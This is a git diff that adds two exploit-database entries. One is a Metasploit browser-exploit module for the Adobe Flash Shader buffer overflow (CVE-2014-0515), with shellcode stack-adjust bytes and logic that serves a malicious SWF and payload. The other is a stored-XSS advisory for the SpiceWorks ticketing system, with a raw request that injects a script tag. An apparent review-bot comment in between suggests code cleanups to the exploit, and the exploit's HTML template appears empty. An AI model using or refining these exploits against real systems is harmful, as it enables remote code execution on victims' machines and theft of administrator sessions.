@@ -0,0 +1,129 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => "Adobe Flash Player Shader Buffer Overflow", + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in Adobe Flash Player. The + vulnerability occurs in the flash.Display.Shader class, when setting specially + crafted data as its bytecode, as exploited in the wild in April 2014. This module + has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over + Windows XP SP3, Windows 7 SP1 and Windows 8. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2014-0515'], + ['BID', '67092'], + ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'], + ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'], + ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ] + ], + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + 'PrependEncoder' => stack_adjust + }, + 'DefaultOptions' => + { + 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'EXITFUNC' => "thread" + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", + :method => "LoadMovie", + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') } + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' 
=> false, + 'DisclosureDate' => "Apr 28 2014", + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def stack_adjust + adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb + adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit + adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit + adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset + + adjust + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + tag = retrieve_tag(cli, request) + profile = get_profile(tag) + profile[:tried] = false unless profile.nil? # to allow request the swf + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + flash_payload = "" + get_payload(cli,target_info).unpack("V*").each do |i| + flash_payload << "0x#{i.to_s(16)}," + end + flash_payload.gsub!(/,$/, "") + + + html_template = %Q| + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end \ No newline at end of file diff --git a/platforms/windows/webapps/33330.txt b/platforms/windows/webapps/33330.txt new file mode 100755 index 000000000..3ff6db7bb --- /dev/null +++ b/platforms/windows/webapps/33330.txt 
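Review bot: `exploit_template` builds `flash_payload` by appending `"0x…,"` per dword and then stripping the trailing comma with `gsub!`; `flash_payload = get_payload(cli, target_info).unpack("V*").map { |i| "0x#{i.to_s(16)}" }.join(",")` expresses the same result in one line with no cleanup pass. In `create_swf`, the block assigns `swf` and the `File.open` return value is assigned to it again; `swf = ::File.binread(path)` is the idiom. The `html_template` heredoc appears empty in this rendering — if that is the committed content rather than extraction loss, the template would serve a page with nothing in it, so it is worth confirming against the source file.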
@@ -0,0 +1,103 @@ +# Exploit Title: Multiple Stored XSS vulnerabilities in SpiceWorks Ticketing system +# Date: 12/05/2014 +# Exploit author: Dolev Farhi @f1nhack +# Vendor homepage: http://spiceworks.com +# Software Link: http://download.spiceworks.com/Spiceworks.exe +# Version: 7.2.00174 (Latest) +# Tested on: Kali Linux +# Vendor alerted: 12/05/2014 + +1. About the application: +======================= + SpiceWorks is an IT ticketing system deployed in many companies around the world + + +2. Vulnerability Description: +========================= +Multiple stored XSS were found in SpiceWorks system, allowing an attacker to create a SpiceWorks IT ticket with malicious code. +once an admin attemps to login to the system dashboard to view open tickets, the code executes and the attacker +could potentially steal the admin's cookies. + + +3. PoC Videos: +=============== +https://www.youtube.com/watch?v=lG5Y_okTaos&feature=youtu.be +https://www.youtube.com/watch?v=efIyZRTDS9c + +Steps to reproduce: + i. Create a ticket in user_portal with the title + ii. submit. + iii. login as admin user and navigate to the open tickets, the XSS appears. + +4. Session Logs: +<-> Vulnerability 1 <-> + +
+
+ + + + + +<-> Vulnerability 2 <-> + +POST /settings/advanced/save_system_setting?name=pdf_header_color HTTP/1.1 + +Host: ip.add.re.ss + +User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0 + +Accept: text/javascript, text/html, application/xml, text/xml, */* + +Accept-Language: en-US,en;q=0.5 + +Accept-Encoding: gzip, deflate + +X-Requested-With: XMLHttpRequest + +X-Prototype-Version: 1.6.1 + +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + +Referer: http://192.168.186.31/settings/advanced?more_settings=true + +Content-Length: 177 + +Cookie: user_id=BAgw--XXXX6231342123XXXX234213515; portal_user_email=BAhJIhV1c2VyMTk4N0BnbXguY29tBjoGRVQ%3D--f9cd3afeeb246cb35d3670914c45c30e427b76f7; __utma=1.399722362.1399878889.1399878889.1399878889.1; __utmb=1.107.0.1399879583954; __utmz=1.1399878889.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); spiceworks_session=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%3D%3D--64198aa54c349fff2e6e7db88fe63d864cec55fe; compatibility_test=testing; __utmc=1; last_view=open_tickets; tickets_per_page=25 + +Connection: keep-alive + +Pragma: no-cache + +Cache-Control: no-cache + + +_pickaxe=%E2%B8%95&value=%3Cscript%3Ealert(%22pdf001%22)%3C%2Fscript%3E&editorId=pdf_header_color_inplace&authenticity_token=FBF0%2F%2FCedbds5KOWNO3ik%2BAPyP2onspx8Y3O9GNYMlY%3D + + +